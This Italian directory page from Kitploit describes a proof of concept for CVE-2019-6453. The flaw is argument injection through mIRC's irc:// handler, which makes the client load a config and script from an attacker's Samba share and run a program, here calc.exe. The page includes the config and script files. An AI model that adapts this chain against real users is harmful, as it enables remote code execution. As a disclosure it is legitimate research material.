Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
mIRC-CVE-2019-6453 — Prova di concetto per CVE-2019-6453 | Kitploit
Strumenti/GitHubGitHub/andripwn/mirc-cve-2019-6453
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubandripwn/mirc-cve-2019-6453

mIRC-CVE-2019-6453

Prova di concetto per CVE-2019-6453

Vedi Repository
117 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-6453: RCE su mIRC <7.55 tramite injection di argomenti attraverso gestori di protocollo URI personalizzati

[Link al write-up]

Abbiamo trovato una vulnerabilità di Esecuzione di Codice Remota in mIRC attraverso il gestore di protocollo URI irc://. Poiché mIRC non utilizza alcun tipo di sigillo come -- per contrassegnare la fine dell'elenco degli argomenti, un attaccante può passare argomenti a mIRC tramite un link irc:// ed eseguire codice arbitrario caricando un mirc.ini personalizzato da un server file Samba controllato dall'attaccante. Si noti che ircs:// funziona allo stesso modo.

PoC

La proof of calc richiede tre file: mirc.ini, calc.ini e poc.html. Supponiamo che un server file Samba sia in esecuzione sul lato dell'attaccante. Ai fini dell'esempio, i seguenti frammenti di codice assumono che sia in esecuzione sull'host 127.0.0.1 (cioè sostituisci 127.0.0.1 con l'indirizzo del tuo server nei file seguenti per provare).

mirc.ini

mirc.ini è un file di configurazione personalizzato che dovrebbe trovarsi in C:\mirc-poc\mirc.ini sul server file.

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

Scarica lo strumento

calc.ini è un file script remoto che dovrebbe trovarsi in C:\mirc-poc\calc.ini sul server file.

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

Visitando semplicemente poc.html dovrebbe funzionare supponendo che mIRC sia impostato come gestore predefinito per lo schema URI irc:// e che il browser non codifichi il payload. A seconda del browser e della configurazione, potresti comunque ricevere un prompt (non è il caso su Firefox).

root@kitploit:~

PoC gif

PoC gif

Versioni affette

Questo PoC funziona per mIRC <7.55.

Puoi attivare il PoC su Edge 42.17134 (ultima versione preview) e Firefox 64.0.2 (ultima release). Non funziona su Chrome per via del modo in cui Chrome gestisce i protocolli URI (l'URI viene codificato prima di essere passato all'applicazione).